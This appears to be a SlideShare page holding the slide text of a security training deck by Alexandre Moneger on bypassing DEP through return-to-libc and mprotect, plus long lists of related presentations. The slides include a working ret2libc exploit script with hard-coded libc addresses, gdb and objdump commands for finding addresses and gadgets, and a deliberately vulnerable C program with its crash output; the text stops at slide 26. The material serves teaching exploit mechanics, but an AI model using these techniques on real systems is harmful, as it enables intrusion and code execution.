Soumettre la recherche
Mettre en ligne
05 - Bypassing DEP, or why ASLR matters
•
2 j'aime
•
1,496 vues
A
Alexandre Moneger
Suivre
* How to bypass X^W * Why ASLR matters
Lire moins
Lire la suite
Ingénierie
Signaler
Partager
Signaler
Partager
1 sur 31
Recommandé
07 - Bypassing ASLR, or why X^W matters
07 - Bypassing ASLR, or why X^W matters
Alexandre Moneger
Design and implementation_of_shellcodes
Design and implementation_of_shellcodes
Amr Ali
Linux Shellcode disassembling
Linux Shellcode disassembling
Harsh Daftary
04 - I love my OS, he protects me (sometimes, in specific circumstances)
04 - I love my OS, he protects me (sometimes, in specific circumstances)
Alexandre Moneger
09 - ROP countermeasures, can we fix this?
09 - ROP countermeasures, can we fix this?
Alexandre Moneger
02 - Introduction to the cdecl ABI and the x86 stack
02 - Introduction to the cdecl ABI and the x86 stack
Alexandre Moneger
03 - Refresher on buffer overflow in the old days
03 - Refresher on buffer overflow in the old days
Alexandre Moneger
深入淺出C語言
深入淺出C語言
Simen Li
Recommandé
07 - Bypassing ASLR, or why X^W matters
07 - Bypassing ASLR, or why X^W matters
Alexandre Moneger
Design and implementation_of_shellcodes
Design and implementation_of_shellcodes
Amr Ali
Linux Shellcode disassembling
Linux Shellcode disassembling
Harsh Daftary
04 - I love my OS, he protects me (sometimes, in specific circumstances)
04 - I love my OS, he protects me (sometimes, in specific circumstances)
Alexandre Moneger
09 - ROP countermeasures, can we fix this?
09 - ROP countermeasures, can we fix this?
Alexandre Moneger
02 - Introduction to the cdecl ABI and the x86 stack
02 - Introduction to the cdecl ABI and the x86 stack
Alexandre Moneger
03 - Refresher on buffer overflow in the old days
03 - Refresher on buffer overflow in the old days
Alexandre Moneger
深入淺出C語言
深入淺出C語言
Simen Li
NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練
NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練
Sheng-Hao Ma
Return Oriented Programming (ROP) Based Exploits - Part I
Return Oriented Programming (ROP) Based Exploits - Part I
n|u - The Open Security Community
Network security Lab manual
Network security Lab manual
Vivek Kumar Sinha
Shellcodes for ARM: Your Pills Don't Work on Me, x86
Shellcodes for ARM: Your Pills Don't Work on Me, x86
Svetlana Gaivoronski
Network security mannual (2)
Network security mannual (2)
Vivek Kumar Sinha
Cisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-one
DefconRussia
TDOH 南區 WorkShop 2016 Reversing on Windows
TDOH 南區 WorkShop 2016 Reversing on Windows
Sheng-Hao Ma
ROP 輕鬆談
ROP 輕鬆談
hackstuff
TDOH x 台科 pwn課程
TDOH x 台科 pwn課程
Weber Tsai
One Shellcode to Rule Them All: Cross-Platform Exploitation
One Shellcode to Rule Them All: Cross-Platform Exploitation
Quinn Wilton
Interpreter, Compiler, JIT from scratch
Interpreter, Compiler, JIT from scratch
National Cheng Kung University
IT6712 lab manual
IT6712 lab manual
Madhu Amarnath
Handling inline assembly in Clang and LLVM
Handling inline assembly in Clang and LLVM
Min-Yih Hsu
[2012 CodeEngn Conference 06] pwn3r - Secuinside 2012 CTF 예선 문제풀이
[2012 CodeEngn Conference 06] pwn3r - Secuinside 2012 CTF 예선 문제풀이
GangSeok Lee
System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting
System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting
sanghwan ahn
Thoughts On Learning A New Programming Language
Thoughts On Learning A New Programming Language
Patricia Aas
Introduction to Debuggers
Introduction to Debuggers
Saumil Shah
NTUSTxTDOH - Pwn基礎 2015/12/27
NTUSTxTDOH - Pwn基礎 2015/12/27
Sheng-Hao Ma
Codes
Codes
Narayan Loke
System Hacking Tutorial #2 - Buffer Overflow - Overwrite EIP
System Hacking Tutorial #2 - Buffer Overflow - Overwrite EIP
sanghwan ahn
Efficient Bytecode Analysis: Linespeed Shellcode Detection
Efficient Bytecode Analysis: Linespeed Shellcode Detection
Georg Wicherski
Anatomy of A Shell Code, Reverse engineering
Anatomy of A Shell Code, Reverse engineering
Abhineet Ayan
Contenu connexe
Tendances
NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練
NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練
Sheng-Hao Ma
Return Oriented Programming (ROP) Based Exploits - Part I
Return Oriented Programming (ROP) Based Exploits - Part I
n|u - The Open Security Community
Network security Lab manual
Network security Lab manual
Vivek Kumar Sinha
Shellcodes for ARM: Your Pills Don't Work on Me, x86
Shellcodes for ARM: Your Pills Don't Work on Me, x86
Svetlana Gaivoronski
Network security mannual (2)
Network security mannual (2)
Vivek Kumar Sinha
Cisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-one
DefconRussia
TDOH 南區 WorkShop 2016 Reversing on Windows
TDOH 南區 WorkShop 2016 Reversing on Windows
Sheng-Hao Ma
ROP 輕鬆談
ROP 輕鬆談
hackstuff
TDOH x 台科 pwn課程
TDOH x 台科 pwn課程
Weber Tsai
One Shellcode to Rule Them All: Cross-Platform Exploitation
One Shellcode to Rule Them All: Cross-Platform Exploitation
Quinn Wilton
Interpreter, Compiler, JIT from scratch
Interpreter, Compiler, JIT from scratch
National Cheng Kung University
IT6712 lab manual
IT6712 lab manual
Madhu Amarnath
Handling inline assembly in Clang and LLVM
Handling inline assembly in Clang and LLVM
Min-Yih Hsu
[2012 CodeEngn Conference 06] pwn3r - Secuinside 2012 CTF 예선 문제풀이
[2012 CodeEngn Conference 06] pwn3r - Secuinside 2012 CTF 예선 문제풀이
GangSeok Lee
System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting
System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting
sanghwan ahn
Thoughts On Learning A New Programming Language
Thoughts On Learning A New Programming Language
Patricia Aas
Introduction to Debuggers
Introduction to Debuggers
Saumil Shah
NTUSTxTDOH - Pwn基礎 2015/12/27
NTUSTxTDOH - Pwn基礎 2015/12/27
Sheng-Hao Ma
Codes
Codes
Narayan Loke
System Hacking Tutorial #2 - Buffer Overflow - Overwrite EIP
System Hacking Tutorial #2 - Buffer Overflow - Overwrite EIP
sanghwan ahn
Tendances
(20)
NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練
NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練
Return Oriented Programming (ROP) Based Exploits - Part I
Return Oriented Programming (ROP) Based Exploits - Part I
Network security Lab manual
Network security Lab manual
Shellcodes for ARM: Your Pills Don't Work on Me, x86
Shellcodes for ARM: Your Pills Don't Work on Me, x86
Network security mannual (2)
Network security mannual (2)
Cisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-one
TDOH 南區 WorkShop 2016 Reversing on Windows
TDOH 南區 WorkShop 2016 Reversing on Windows
ROP 輕鬆談
ROP 輕鬆談
TDOH x 台科 pwn課程
TDOH x 台科 pwn課程
One Shellcode to Rule Them All: Cross-Platform Exploitation
One Shellcode to Rule Them All: Cross-Platform Exploitation
Interpreter, Compiler, JIT from scratch
Interpreter, Compiler, JIT from scratch
IT6712 lab manual
IT6712 lab manual
Handling inline assembly in Clang and LLVM
Handling inline assembly in Clang and LLVM
[2012 CodeEngn Conference 06] pwn3r - Secuinside 2012 CTF 예선 문제풀이
[2012 CodeEngn Conference 06] pwn3r - Secuinside 2012 CTF 예선 문제풀이
System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting
System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting
Thoughts On Learning A New Programming Language
Thoughts On Learning A New Programming Language
Introduction to Debuggers
Introduction to Debuggers
NTUSTxTDOH - Pwn基礎 2015/12/27
NTUSTxTDOH - Pwn基礎 2015/12/27
Codes
Codes
System Hacking Tutorial #2 - Buffer Overflow - Overwrite EIP
System Hacking Tutorial #2 - Buffer Overflow - Overwrite EIP
En vedette
Efficient Bytecode Analysis: Linespeed Shellcode Detection
Efficient Bytecode Analysis: Linespeed Shellcode Detection
Georg Wicherski
Anatomy of A Shell Code, Reverse engineering
Anatomy of A Shell Code, Reverse engineering
Abhineet Ayan
Java Shellcode Execution
Java Shellcode Execution
Ryan Wincey
Shellcode and heapspray detection in phoneyc
Shellcode and heapspray detection in phoneyc
Z Chen
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
Michele Orru
Exploit Research and Development Megaprimer: Unicode Based Exploit Development
Exploit Research and Development Megaprimer: Unicode Based Exploit Development
Ajin Abraham
Talking about exploit writing
Talking about exploit writing
sbha0909
Anton Dorfman. Shellcode Mastering.
Anton Dorfman. Shellcode Mastering.
Positive Hack Days
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013
midnite_runr
Shellcode Analysis - Basic and Concept
Shellcode Analysis - Basic and Concept
Julia Yu-Chin Cheng
Hacking school computers for fun profit and better grades short
Hacking school computers for fun profit and better grades short
Vincent Ohprecio
Exploit Research and Development Megaprimer: Win32 Egghunter
Exploit Research and Development Megaprimer: Win32 Egghunter
Ajin Abraham
Software Exploits
Software Exploits
KevinCSmallwood
Shellcode injection
Shellcode injection
Dhaval Kapil
Writing Metasploit Plugins
Writing Metasploit Plugins
amiable_indian
Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...
Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...
Michele Orru
Low Level Exploits
Low Level Exploits
hughpearse
Fuzzing | Null OWASP Mumbai | 2016 June
Fuzzing | Null OWASP Mumbai | 2016 June
nullowaspmumbai
Advanced exploit development
Advanced exploit development
Dan H
The State of the Veil Framework
The State of the Veil Framework
VeilFramework
En vedette
(20)
Efficient Bytecode Analysis: Linespeed Shellcode Detection
Efficient Bytecode Analysis: Linespeed Shellcode Detection
Anatomy of A Shell Code, Reverse engineering
Anatomy of A Shell Code, Reverse engineering
Java Shellcode Execution
Java Shellcode Execution
Shellcode and heapspray detection in phoneyc
Shellcode and heapspray detection in phoneyc
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
Exploit Research and Development Megaprimer: Unicode Based Exploit Development
Exploit Research and Development Megaprimer: Unicode Based Exploit Development
Talking about exploit writing
Talking about exploit writing
Anton Dorfman. Shellcode Mastering.
Anton Dorfman. Shellcode Mastering.
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013
Shellcode Analysis - Basic and Concept
Shellcode Analysis - Basic and Concept
Hacking school computers for fun profit and better grades short
Hacking school computers for fun profit and better grades short
Exploit Research and Development Megaprimer: Win32 Egghunter
Exploit Research and Development Megaprimer: Win32 Egghunter
Software Exploits
Software Exploits
Shellcode injection
Shellcode injection
Writing Metasploit Plugins
Writing Metasploit Plugins
Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...
Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...
Low Level Exploits
Low Level Exploits
Fuzzing | Null OWASP Mumbai | 2016 June
Fuzzing | Null OWASP Mumbai | 2016 June
Advanced exploit development
Advanced exploit development
The State of the Veil Framework
The State of the Veil Framework
Similaire à 05 - Bypassing DEP, or why ASLR matters
08 - Return Oriented Programming, the chosen one
08 - Return Oriented Programming, the chosen one
Alexandre Moneger
Defcon 22 - Stitching numbers - generating rop payloads from in memory numbers
Defcon 22 - Stitching numbers - generating rop payloads from in memory numbers
Alexandre Moneger
Library Operating System for Linux #netdev01
Library Operating System for Linux #netdev01
Hajime Tazaki
Secure Programming Practices in C++ (NDC Oslo 2018)
Secure Programming Practices in C++ (NDC Oslo 2018)
Patricia Aas
Power of linked list
Power of linked list
Peter Hlavaty
[CCC-28c3] Post Memory Corruption Memory Analysis
[CCC-28c3] Post Memory Corruption Memory Analysis
Moabi.com
Rsockets ofa12
Rsockets ofa12
trustitrusti
리눅스 드라이버 실습 #3
리눅스 드라이버 실습 #3
Sangho Park
Pragmatic Optimization in Modern Programming - Demystifying the Compiler
Pragmatic Optimization in Modern Programming - Demystifying the Compiler
Marina Kolpakova
secure lazy binding, and the 64bit time_t development process by Philip Guenther
secure lazy binding, and the 64bit time_t development process by Philip Guenther
eurobsdcon
Code Red Security
Code Red Security
Amr Ali
ROP ‘n’ ROLL, a peak into modern exploits
ROP ‘n’ ROLL, a peak into modern exploits
Alexandre Moneger
fg.workshop: Software vulnerability
fg.workshop: Software vulnerability
fg.informatik Universität Basel
Euro python2011 High Performance Python
Euro python2011 High Performance Python
Ian Ozsvald
C++ Core Guidelines
C++ Core Guidelines
Thomas Pollak
Php extensions
Php extensions
Elizabeth Smith
Linux networking
Linux networking
Arie Bregman
CompilersAndLibraries
CompilersAndLibraries
Staffan Tjernström
The true story_of_hello_world
The true story_of_hello_world
fantasy zheng
Filip palian mateuszkocielski. simplest ownage human observed… routers
Filip palian mateuszkocielski. simplest ownage human observed… routers
Yury Chemerkin
Similaire à 05 - Bypassing DEP, or why ASLR matters
(20)
08 - Return Oriented Programming, the chosen one
08 - Return Oriented Programming, the chosen one
Defcon 22 - Stitching numbers - generating rop payloads from in memory numbers
Defcon 22 - Stitching numbers - generating rop payloads from in memory numbers
Library Operating System for Linux #netdev01
Library Operating System for Linux #netdev01
Secure Programming Practices in C++ (NDC Oslo 2018)
Secure Programming Practices in C++ (NDC Oslo 2018)
Power of linked list
Power of linked list
[CCC-28c3] Post Memory Corruption Memory Analysis
[CCC-28c3] Post Memory Corruption Memory Analysis
Rsockets ofa12
Rsockets ofa12
리눅스 드라이버 실습 #3
리눅스 드라이버 실습 #3
Pragmatic Optimization in Modern Programming - Demystifying the Compiler
Pragmatic Optimization in Modern Programming - Demystifying the Compiler
secure lazy binding, and the 64bit time_t development process by Philip Guenther
secure lazy binding, and the 64bit time_t development process by Philip Guenther
Code Red Security
Code Red Security
ROP ‘n’ ROLL, a peak into modern exploits
ROP ‘n’ ROLL, a peak into modern exploits
fg.workshop: Software vulnerability
fg.workshop: Software vulnerability
Euro python2011 High Performance Python
Euro python2011 High Performance Python
C++ Core Guidelines
C++ Core Guidelines
Php extensions
Php extensions
Linux networking
Linux networking
CompilersAndLibraries
CompilersAndLibraries
The true story_of_hello_world
The true story_of_hello_world
Filip palian mateuszkocielski. simplest ownage human observed… routers
Filip palian mateuszkocielski. simplest ownage human observed… routers
Plus de Alexandre Moneger
Scapy TLS: A scriptable TLS 1.3 stack
Scapy TLS: A scriptable TLS 1.3 stack
Alexandre Moneger
BSides LV 2016 - Beyond the tip of the iceberg - fuzzing binary protocols for...
BSides LV 2016 - Beyond the tip of the iceberg - fuzzing binary protocols for...
Alexandre Moneger
Pentesting custom TLS stacks
Pentesting custom TLS stacks
Alexandre Moneger
NBTC#2 - Why instrumentation is cooler then ice
NBTC#2 - Why instrumentation is cooler then ice
Alexandre Moneger
Practical rsa padding oracle attacks
Practical rsa padding oracle attacks
Alexandre Moneger
06 - ELF format, knowing your friend
06 - ELF format, knowing your friend
Alexandre Moneger
Plus de Alexandre Moneger
(6)
Scapy TLS: A scriptable TLS 1.3 stack
Scapy TLS: A scriptable TLS 1.3 stack
BSides LV 2016 - Beyond the tip of the iceberg - fuzzing binary protocols for...
BSides LV 2016 - Beyond the tip of the iceberg - fuzzing binary protocols for...
Pentesting custom TLS stacks
Pentesting custom TLS stacks
NBTC#2 - Why instrumentation is cooler then ice
NBTC#2 - Why instrumentation is cooler then ice
Practical rsa padding oracle attacks
Practical rsa padding oracle attacks
06 - ELF format, knowing your friend
06 - ELF format, knowing your friend
Dernier
"Exploring the Essential Functions and Design Considerations of Spillways in ...
"Exploring the Essential Functions and Design Considerations of Spillways in ...
Erbil Polytechnic University
『澳洲文凭』买麦考瑞大学毕业证书成绩单办理澳洲Macquarie文凭学位证书
『澳洲文凭』买麦考瑞大学毕业证书成绩单办理澳洲Macquarie文凭学位证书
rnrncn29
OOP concepts -in-Python programming language
OOP concepts -in-Python programming language
SmritiSharma901052
Robotics-Asimov's Laws, Mechanical Subsystems, Robot Kinematics, Robot Dynami...
Robotics-Asimov's Laws, Mechanical Subsystems, Robot Kinematics, Robot Dynami...
Sumanth A
List of Accredited Concrete Batching Plant.pdf
List of Accredited Concrete Batching Plant.pdf
isabel213075
Main Memory Management in Operating System
Main Memory Management in Operating System
Rashmi Bhat
TechTAC® CFD Report Summary: A Comparison of Two Types of Tubing Anchor Catchers
TechTAC® CFD Report Summary: A Comparison of Two Types of Tubing Anchor Catchers
sdickerson1
Earthing details of Electrical Substation
Earthing details of Electrical Substation
stephanwindworld
DEVICE DRIVERS AND INTERRUPTS SERVICE MECHANISM.pdf
DEVICE DRIVERS AND INTERRUPTS SERVICE MECHANISM.pdf
AkritiPradhan2
System Simulation and Modelling with types and Event Scheduling
System Simulation and Modelling with types and Event Scheduling
BootNeck1
Comparative study of High-rise Building Using ETABS,SAP200 and SAFE., SAFE an...
Comparative study of High-rise Building Using ETABS,SAP200 and SAFE., SAFE an...
Erbil Polytechnic University
Prach: A Feature-Rich Platform Empowering the Autism Community
Prach: A Feature-Rich Platform Empowering the Autism Community
prachaibot
Levelling - Rise and fall - Height of instrument method
Levelling - Rise and fall - Height of instrument method
Manicka Mamallan Andavar
Input Output Management in Operating System
Input Output Management in Operating System
Rashmi Bhat
Stork Webinar | APM Transformational planning, Tool Selection & Performance T...
Stork Webinar | APM Transformational planning, Tool Selection & Performance T...
Stork
Energy Awareness training ppt for manufacturing process.pptx
Energy Awareness training ppt for manufacturing process.pptx
siddharthjain2303
Immutable Image-Based Operating Systems - EW2024.pdf
Immutable Image-Based Operating Systems - EW2024.pdf
Drew Moseley
Turn leadership mistakes into a better future.pptx
Turn leadership mistakes into a better future.pptx
Stephen Sitton
Gravity concentration_MI20612MI_________
Gravity concentration_MI20612MI_________
Romil Mishra
CME 397 - SURFACE ENGINEERING - UNIT 1 FULL NOTES
CME 397 - SURFACE ENGINEERING - UNIT 1 FULL NOTES
karthi keyan
Dernier
(20)
"Exploring the Essential Functions and Design Considerations of Spillways in ...
"Exploring the Essential Functions and Design Considerations of Spillways in ...
『澳洲文凭』买麦考瑞大学毕业证书成绩单办理澳洲Macquarie文凭学位证书
『澳洲文凭』买麦考瑞大学毕业证书成绩单办理澳洲Macquarie文凭学位证书
OOP concepts -in-Python programming language
OOP concepts -in-Python programming language
Robotics-Asimov's Laws, Mechanical Subsystems, Robot Kinematics, Robot Dynami...
Robotics-Asimov's Laws, Mechanical Subsystems, Robot Kinematics, Robot Dynami...
List of Accredited Concrete Batching Plant.pdf
List of Accredited Concrete Batching Plant.pdf
Main Memory Management in Operating System
Main Memory Management in Operating System
TechTAC® CFD Report Summary: A Comparison of Two Types of Tubing Anchor Catchers
TechTAC® CFD Report Summary: A Comparison of Two Types of Tubing Anchor Catchers
Earthing details of Electrical Substation
Earthing details of Electrical Substation
DEVICE DRIVERS AND INTERRUPTS SERVICE MECHANISM.pdf
DEVICE DRIVERS AND INTERRUPTS SERVICE MECHANISM.pdf
System Simulation and Modelling with types and Event Scheduling
System Simulation and Modelling with types and Event Scheduling
Comparative study of High-rise Building Using ETABS,SAP200 and SAFE., SAFE an...
Comparative study of High-rise Building Using ETABS,SAP200 and SAFE., SAFE an...
Prach: A Feature-Rich Platform Empowering the Autism Community
Prach: A Feature-Rich Platform Empowering the Autism Community
Levelling - Rise and fall - Height of instrument method
Levelling - Rise and fall - Height of instrument method
Input Output Management in Operating System
Input Output Management in Operating System
Stork Webinar | APM Transformational planning, Tool Selection & Performance T...
Stork Webinar | APM Transformational planning, Tool Selection & Performance T...
Energy Awareness training ppt for manufacturing process.pptx
Energy Awareness training ppt for manufacturing process.pptx
Immutable Image-Based Operating Systems - EW2024.pdf
Immutable Image-Based Operating Systems - EW2024.pdf
Turn leadership mistakes into a better future.pptx
Turn leadership mistakes into a better future.pptx
Gravity concentration_MI20612MI_________
Gravity concentration_MI20612MI_________
CME 397 - SURFACE ENGINEERING - UNIT 1 FULL NOTES
CME 397 - SURFACE ENGINEERING - UNIT 1 FULL NOTES
05 - Bypassing DEP, or why ASLR matters
1.
Bypassing DEP Why
ASLR matters Alex Moneger Security Engineer Why ASLR matters
2.
Refresher Classic
buffer overflows store the shellcode on the stack Shellcode is executed on the stack This requires the stack to be executable In modern Oss, stack is not executable, because it is a data section Can we still exploit this? © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 2
3.
Ret2libc © 2013-2014
Cisco and/or its affiliates. All rights reserved. Cisco Confidential 3
4.
Approach Consider
ASLR is disabled. What impact does this have? ASLR disabled = predictable addresses What can we do with predictable addresses? Maybe we can call them from the stack? What do we control which allows hijacking of control flow? SEIP (or local function pointer) again! © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 4
5.
Concepts We
control SEIP (where we redirect the control flow to) But can we control arguments passed to the function? How are arguments passed to functions? On the stack! Function expects it’s first argument at ebp+0x8 Where are ebp and esp at control flow hijack time? © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 5
6.
Stack registers
Function epilogue (return from vulnerable function) mov esp,ebp pop ebp ret Function prologue (function we control) push ebp mov ebp,esp After the prologue of our function esp = ebp esp = 0xa, ebp = 0xb, sebp = 0x41414141 1. esp = 0xb, ebp = 0xb, sebp = 0x41414141 2. esp = 0xb, ebp = 0x41414141 3. esp = 0xb, ebp = 0x41414141 4. esp = 0xb, ebp = 0xb © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 6
7.
What it looks
like after function prologue esp = ebp Function expects first arg to be at ebp + 0x8 Function expects SEIP at ebp + 0x4 Our stack frame at entry of our controlled function looks like this: arg… arg1 SEIP Func 0x41414141 0x41414141 0x41414141 0x41414141 0x41414141 0x41414141 EBP+0x8 EBP+0x4 EBP ESP © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 7
8.
Libc maybe?
So we know we can call a function with arguments What library provides all core components? Libc! Let’s use functions in libc to exploit our program A Shell would be nice, let’s use the system() function System() takes one argument, the binary to run, “/bin/sh” would do it? © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 8
9.
Stack System() example
We need the address of system() We need the address of something pointing to “/bin/sh” How do we get a random string in our binary: 1. Environment variables 2. “/bin/sh” string is in libc address space &”/bin/sh” JUNK &system 0x41414141 0x41414141 0x41414141 0x41414141 0x41414141 0x41414141 EBP+0x8 EBP+0x4 EBP ESP © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 9
10.
Getting addresses cisco@kali:~/src/seccon/ch5$
invoke -d ch5 $(python -c 'print "A"*128') Reading symbols from /home/cisco/src/seccon/ch5/ch5...done. gdb$ break main Breakpoint 1 at 0x8048466: file ch5.c, line 12. gdb$ r Breakpoint 1, main (argc=2, argv=0xbffffdb4) at ch5.c:12 gdb$ p/x &system $1 = 0xb7e9bf10 gdb$ p/x &exit $2 = 0xb7e8f550 gdb$ find 0xb7e9bf10,+99999999,"/bin/sh" 0xb7f9a4f4 warning: Unable to access target memory at 0xb7fc15fc, halting search. 1 pattern found. gdb$ q © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 10
11.
The exploit cisco@kali:~/src/seccon/ch5$
pygmentize -g ch5.py #!/usr/bin/env python # -*- coding: utf-8 -*- import os import struct as s target = "ch5" overflow_len = 112 system_addr = 0xb7e9bf10 exit_addr = 0xb7e8f550 sh_addr = 0xb7f9a4f4 target_path = os.path.abspath(target) ex = 'A'*overflow_len # Hijack flow to system() ex += s.pack("<I", 0xb7e9bf10) # SEIP in system() context, be clean, call exit() ex += s.pack("<I", 0xb7e8f550) # Address of "/bin/sh" ex += s.pack("<I", 0xb7f9a4f4) os.execve(target_path, (target_path, ex), os.environ) © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 11
12.
What it does
Hijacks flow to system() in libc Passes the address of “/bin/sh” as argv Puts exit() address as return address of system(). Exit cleanly cisco@kali:~/src/seccon/ch5$ invoke ./ch5.py $ exit © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 12
13.
Chaining calls ©
2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 13
14.
1 functions call,
come on… How could you chain function calls? You need to be able to: 1. Remove previous arguments from the stack 2. Return to next function Introduce the pop;pop;ret construct: 1. Remember pop? It allows to control ESP, thus removing elements from the stack 2. Ret effectively pops eip and jumps to it. Maybe we could use as many pops as function arguments and return after that? © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 14
15.
pop;pop;ret construct
The number of “pop reg” determines how many arguments are removed Allows to chain function calls Need to find pop;pop;ret &next_func arg1 &pop;ret &next_func arg2 arg1 &pop;pop;ret &func ret pop reg ret pop reg pop reg © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 15
16.
Finding pop;pop;ret
Find all rets in a binary, and disassemble backwards Gives you an interesting set of elements to work with cisco@kali:~$ objdump -d -j .text -M intel /lib/libc.so.6 | grep ret -B 3 > ch5.ggt cisco@kali:~$ head ch5.ggt 16c60: 55 push ebp 16c61: 89 e5 mov ebp,esp 16c63: 5d pop ebp 16c64: c3 ret -- 16ce7: 8b 7d fc mov edi,DWORD PTR [ebp-0x4] 16cea: 89 ec mov esp,ebp 16cec: 5d pop ebp 16ced: c3 ret © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 16
17.
Nice ppr
Avoid: 1. leave instructions before the ret (;) fror now) 2. Pop ebp if possible They modify the stack A nice one, which doesn’t change the stack: cisco@kali:~$ egrep "pop[[:space:]]+eax" -A 2 -B 1 ch5.ggt | tail -n 4 d7f21: 59 pop ecx d7f22: 58 pop eax d7f23: c3 ret © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 17
18.
Running anything ©
2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 18
19.
I want to
use my shellcode What if you want something that requires too much complexity? Something for which you already have a shellcode maybe Can I execute a shellcode ret2libc style? You certainly can, under some classes of bugs © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 19
20.
Mprotect() Libc
exposes mprotect() Allows to set permissions for a page for memory Prototype: SYNOPSIS #include <sys/mman.h> int mprotect(void *addr, size_t len, int prot); ret Has to be aligned on page boundary: cisco@kali:~/src/seccon/ch5$ pygmentize -g ch5-mp.py | grep stack stack_page = buf_addr & -0x1000 © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 20
21.
ret2mprotect Let’s
use mprotect() to change the permissions of the stack to RWE Then jump to our shellcode Example: shellcode address: 0xbffffce8: Page address: 0xbffffce8 & -0x1000 = 0xbffff000 Mprotect(0xbffff000, 0x1000, 0x7), RWE = 0x7 Now, that page of stack is RWE Jump to shellcode as usual => 0xbffffce8 perms size &stack_page &shellcode &mprotect 0x41414141 0x41414141 0x41414141 0x41414141 Shellcode © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 21
22.
Constraints Vulnerabilities
have to allow null bytes, because: 1. Page boundaries contain null bytes by definition 2. Size is a 32 bit integer 3. Permissions is a 32 bit integer All above contain null bytes © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 22
23.
Can you spot
it? cisco@kali:~/src/seccon/ch5$ pygmentize -g ch5-mp.c #include <stdlib.h> #include <stdio.h> #include <string.h> struct stuff { unsigned int len; char data[0x64]; }; char * vuln(FILE *fd) { struct stuff s; memset(&(s.len), 0, sizeof(s.len)); memset(&(s.data), 0, sizeof(s.data)); fread(&(s.len), 0x4, 0x1, fd); printf("Data is %d bytes longn", s.len); fread(&(s.data), s.len, 0x1, fd); printf("Got data from file: %sn", &(s.data)); char *p = &s + 0x4; return p; } int main(int argc, char **argv) { if (argc != 2) { exit(1); } FILE *fd = fopen(argv[1], "r"); char *p = vuln(fd); fclose(fd); return 0; © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 23 }
24.
Compile and run
Looks like we control length and data cisco@kali:~/src/seccon/ch5$ cc ch5-mp.c -fno-stack-protector -U_fortify_SOURCE -g -o ch5-mp cisco@kali:~/src/seccon/ch5$ python -c 'import struct as s; print s.pack("<I", 0x3)+"ABCD"' > /tmp/ cisco@kali:~/src/seccon/ch5$ ./ch5-mp /tmp/k Data is 3 bytes long Got data from file: ABC dahtah@kali:~/src/seccon/ch5$ python -c 'import struct as s; print s.pack("<I", 0x100)+"A"*0x74+"B"*4' > /tmp/f dahtah@kali:~/src/seccon/ch5$ invoke ch5-mp /tmp/f Data is 256 bytes long Got data from file: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAABBBB ?@?????????跐??P? Segmentation fault cisco@kali:~/src/seccon/ch5$ dmesg | tail -n 1 [971014.298327] ch5-mp[27676]: segfault at 42424242 ip 42424242 sp bffffd60 error 14 © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 24
25.
GDB time
We need our buffer address We need libc mprotect address cisco@kali:~/src/seccon/ch5$ invoke -d ch5-mp /tmp/f Reading symbols from /home/cisco/src/seccon/ch5/ch5-mp...done. gdb$ break vuln Breakpoint 1 at 0x8048545: file ch5-mp.c, line 12. gdb$ r Breakpoint 1, vuln (fd=0x804a008) at ch5-mp.c:12 gdb$ p/x &(s.data) $3 = 0xbffffce8 gdb$ p/x &mprotect $2 = 0xb7f31e00 gdb$ q © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 25
26.
Putting it together
